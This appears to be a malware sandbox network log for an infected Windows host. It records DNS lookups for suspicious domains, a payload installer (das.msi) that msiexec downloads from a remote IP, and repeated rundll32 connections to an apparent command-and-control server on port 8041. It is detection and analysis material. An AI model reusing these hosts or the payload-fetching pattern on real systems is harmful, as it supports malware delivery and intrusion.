                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:26.438162088 CEST500338041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:26.445600986 CEST80415003380.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:27.063258886 CEST80415003380.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:27.063399076 CEST500338041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:27.063453913 CEST80415003380.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:27.063610077 CEST500338041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:27.063879013 CEST500338041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:52.328881979 CEST80415004582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:52.328943014 CEST500458041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:56.576487064 CEST500468041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:56.581406116 CEST80415004682.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:56.581556082 CEST500468041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:56.589694023 CEST500468041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:56.594912052 CEST80415004682.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:57.196603060 CEST80415004682.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:57.196741104 CEST500468041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:57.197279930 CEST500468041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:57.198812008 CEST500468041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:57.202159882 CEST80415004682.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:57.203917027 CEST80415004682.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:57.204839945 CEST500468041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:01.477157116 CEST500478041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:01.483084917 CEST80415004782.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:01.487195015 CEST500478041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:01.489126921 CEST500478041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:01.495163918 CEST80415004782.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:02.152379990 CEST80415004782.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:02.152457952 CEST500478041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:02.192717075 CEST500478041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:02.197789907 CEST80415004782.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:02.234534979 CEST500478041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:02.240072966 CEST80415004782.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:02.240140915 CEST500478041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:04.491369963 CEST50048443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:04.491406918 CEST44350048188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:04.491463900 CEST50048443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:04.491955042 CEST50048443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:04.491966963 CEST44350048188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:04.969007015 CEST44350048188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:04.969082117 CEST50048443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:05.183135033 CEST50048443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:05.183156967 CEST44350048188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:05.184166908 CEST44350048188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:05.184252024 CEST50048443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:05.187136889 CEST50048443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:05.231395006 CEST44350048188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:05.718070984 CEST500498041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:06.205888987 CEST80415004982.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:06.205997944 CEST500498041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:06.206449986 CEST500498041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:06.211317062 CEST80415004982.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:06.625583887 CEST44350048188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:06.625679016 CEST50048443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:06.625691891 CEST44350048188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:06.625749111 CEST44350048188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:06.625750065 CEST50048443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:06.625812054 CEST50048443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:06.628954887 CEST50048443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:06.628973961 CEST44350048188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:06.961210012 CEST80415004982.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:06.961277008 CEST500498041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:06.961850882 CEST500498041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:06.964040995 CEST500498041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:06.967788935 CEST80415004982.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:06.973247051 CEST80415004982.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:06.973315001 CEST500498041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:07.943624020 CEST50050443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:07.943718910 CEST44350050188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:07.943808079 CEST50050443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:07.944484949 CEST50050443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:07.944521904 CEST44350050188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:08.419292927 CEST44350050188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:08.419441938 CEST50050443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:08.420170069 CEST50050443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:08.420200109 CEST44350050188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:08.421840906 CEST50050443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:08.421854019 CEST44350050188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:08.857695103 CEST44350050188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:08.857763052 CEST50050443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:08.857772112 CEST44350050188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:08.857826948 CEST50050443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:08.860697985 CEST50050443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:08.860724926 CEST44350050188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:09.153625011 CEST50051443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:09.153670073 CEST44350051188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:09.154134989 CEST50051443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:09.154134989 CEST50051443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:09.154170990 CEST44350051188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:09.629378080 CEST44350051188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:09.629936934 CEST50051443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:09.630279064 CEST50051443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:09.630285978 CEST44350051188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:09.634059906 CEST50051443192.168.2.5188.114.96.3
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:09.634068012 CEST44350051188.114.96.3192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:10.059154987 CEST500528041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:44:10.064202070 CEST80415005280.78.24.30192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 3, 2024 20:42:08.096319914 CEST | 192.168.2.5 | 1.1.1.1 | 0x8b3c | Standard query (0) | bazarunet.com | A (IP address) | IN (0x0001) | false
Oct 3, 2024 20:42:14.574228048 CEST | 192.168.2.5 | 1.1.1.1 | 0x1cc4 | Standard query (0) | greshunka.com | A (IP address) | IN (0x0001) | false
Oct 3, 2024 20:42:15.965694904 CEST | 192.168.2.5 | 1.1.1.1 | 0x1a6c | Standard query (0) | tiguanin.com | A (IP address) | IN (0x0001) | false
Oct 3, 2024 20:43:50.584429979 CEST | 192.168.2.5 | 1.1.1.1 | 0xd639 | Standard query (0) | greshunka.com | A (IP address) | IN (0x0001) | false
Oct 3, 2024 20:43:51.571141005 CEST | 192.168.2.5 | 1.1.1.1 | 0xd639 | Standard query (0) | greshunka.com | A (IP address) | IN (0x0001) | false
Oct 3, 2024 20:43:56.422113895 CEST | 192.168.2.5 | 1.1.1.1 | 0x402d | Standard query (0) | greshunka.com | A (IP address) | IN (0x0001) | false
Oct 3, 2024 20:44:01.321063995 CEST | 192.168.2.5 | 1.1.1.1 | 0x7a59 | Standard query (0) | greshunka.com | A (IP address) | IN (0x0001) | false
Oct 3, 2024 20:44:04.470434904 CEST | 192.168.2.5 | 1.1.1.1 | 0xfaec | Standard query (0) | isomicrotich.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 3, 2024 20:42:08.133663893 CEST | 1.1.1.1 | 192.168.2.5 | 0x8b3c | No error (0) | bazarunet.com | | 80.78.24.30 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 20:42:14.867283106 CEST | 1.1.1.1 | 192.168.2.5 | 0x1cc4 | No error (0) | greshunka.com | | 82.115.223.39 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 20:42:16.026420116 CEST | 1.1.1.1 | 192.168.2.5 | 0x1a6c | No error (0) | tiguanin.com | | 80.78.24.30 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 20:43:51.652750015 CEST | 1.1.1.1 | 192.168.2.5 | 0xd639 | No error (0) | greshunka.com | | 82.115.223.39 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 20:43:51.652797937 CEST | 1.1.1.1 | 192.168.2.5 | 0xd639 | No error (0) | greshunka.com | | 82.115.223.39 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 20:43:56.571904898 CEST | 1.1.1.1 | 192.168.2.5 | 0x402d | No error (0) | greshunka.com | | 82.115.223.39 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 20:44:01.472044945 CEST | 1.1.1.1 | 192.168.2.5 | 0x7a59 | No error (0) | greshunka.com | | 82.115.223.39 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 20:44:04.490319014 CEST | 1.1.1.1 | 192.168.2.5 | 0xfaec | No error (0) | isomicrotich.com | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Oct 3, 2024 20:44:04.490319014 CEST | 1.1.1.1 | 192.168.2.5 | 0xfaec | No error (0) | isomicrotich.com | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                                                                                    • isomicrotich.com
                                                                                                                                                                                                                                                    • 188.119.112.7
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 188.119.112.7 | 80 | 768 | C:\Windows\System32\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:42:00.974850893 CEST | 114 | OUT | GET /das.msi HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Windows Installer
Host: 188.119.112.7
Oct 3, 2024 20:42:01.586335897 CEST | 1236 | IN | HTTP/1.1 200 OK
Date: Thu, 03 Oct 2024 18:42:01 GMT
Server: Apache/2.4.58 (Ubuntu)
Last-Modified: Wed, 02 Oct 2024 15:58:58 GMT
ETag: "197800-6238084057480"
Accept-Ranges: bytes
Content-Length: 1669120
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msi
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.586806059 CEST1224INData Raw: 20 74 6f 20 63 68 61 6e 67 65 2e 4e 61 6d 65 20 6f 66 20 74 68 65 20 63 6f 6e 74 72 6f 6c 2e 20 54 68 69 73 20 6e 61 6d 65 20 6d 75 73 74 20 62 65 20 75 6e 69 71 75 65 20 77 69 74 68 69 6e 20 61 20 64 69 61 6c 6f 67 2c 20 62 75 74 20 63 61 6e 20
                                                                                                                                                                                                                                                    Data Ascii: to change.Name of the control. This name must be unique within a dialog, but can repeat on different dialogs. The type of the control.XHorizontal coordinate of the upper left corner of the bounding rectangle of the control.WidthWidth of the b
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.586823940 CEST1236INData Raw: 20 62 79 20 74 68 65 20 66 69 72 73 74 20 74 77 6f 20 65 6e 74 72 69 65 73 2e 41 72 67 75 6d 65 6e 74 41 20 76 61 6c 75 65 20 74 6f 20 62 65 20 75 73 65 64 20 61 73 20 61 20 6d 6f 64 69 66 69 65 72 20 77 68 65 6e 20 74 72 69 67 67 65 72 69 6e 67
                                                                                                                                                                                                                                                    Data Ascii: by the first two entries.ArgumentA value to be used as a modifier when triggering a particular event.A standard conditional statement that specifies under which conditions an event should be triggered.OrderingAn integer used to order several
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:01.591295958 CEST1236INData Raw: 72 6d 69 74 74 65 64 41 20 74 65 78 74 20 73 74 72 69 6e 67 20 73 70 65 63 69 66 79 69 6e 67 20 74 68 65 20 74 69 74 6c 65 20 74 6f 20 62 65 20 64 69 73 70 6c 61 79 65 64 20 69 6e 20 74 68 65 20 74 69 74 6c 65 20 62 61 72 20 6f 66 20 74 68 65 20
                                                                                                                                                                                                                                                    Data Ascii: rmittedA text string specifying the title to be displayed in the title bar of the dialog's window.Control_DefaultDefines the default control. Hitting return is equivalent to pushing this button.Control_CancelDefines the cancel control. Hitting


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49705 | 80.78.24.30 | 8041 | 5880 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:42:08.851995945 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49706 | 80.78.24.30 | 8041 | 5880 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:42:09.497184992 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49709 | 80.78.24.30 | 8041 | 5880 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:42:16.653912067 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49710 | 80.78.24.30 | 8041 | 5880 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:42:17.315656900 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49723 | 80.78.24.30 | 8041 | 5880 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:42:20.085249901 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49725 | 80.78.24.30 | 8041 | 5880 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:42:20.717818975 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49745 | 80.78.24.30 | 8041 | 5880 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:42:23.424285889 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 49751 | 80.78.24.30 | 8041 | 5880 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:42:24.053459883 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 49769 | 80.78.24.30 | 8041 | 5880 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:42:26.779593945 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 49775 | 80.78.24.30 | 8041 | 5880 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:42:27.460541010 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.5 | 49787 | 80.78.24.30 | 8041 | 5880 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:42:29.170537949 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.5 | 49793 | 80.78.24.30 | 8041 | 5880 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:42:29.826313972 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.5 | 49824 | 80.78.24.30 | 8041 | 5880 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:42:34.591407061 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.5 | 49827 | 80.78.24.30 | 8041 | 5880 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:42:35.206974030 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.5 | 49842 | 80.78.24.30 | 8041 | 5880 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:42:36.876251936 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.5 | 49844 | 80.78.24.30 | 8041 | 5880 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:42:37.537655115 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.5 | 49851 | 80.78.24.30 | 8041 | 5880 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:42:38.249438047 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.5 | 49857 | 80.78.24.30 | 8041 | 5880 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:42:38.949831963 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.5 | 49863 | 80.78.24.30 | 8041 | 5880 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:42:39.645021915 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.5 | 49869 | 80.78.24.30 | 8041 | 5880 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:42:40.283513069 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.5 | 49897 | 80.78.24.30 | 8041 | 5880 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:42:44.927695990 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.5 | 49903 | 80.78.24.30 | 8041 | 5880 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:42:45.635402918 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.5 | 49910 | 80.78.24.30 | 8041 | 5880 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:42:46.334979057 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.5 | 49912 | 80.78.24.30 | 8041 | 5880 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:42:46.972744942 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.5 | 50020 | 80.78.24.30 | 8041 | 5880 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:43:04.503603935 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.5 | 50021 | 80.78.24.30 | 8041 | 5880 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 20:43:05.128961086 CEST | 103 | IN | HTTP/1.1 400 Bad Request
Content-Type: text/plain; charset=utf-8
Connection: close
Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    27192.168.2.55002380.78.24.3080415880C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:11.071758986 CEST103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                    Data Ascii: 400 Bad Request


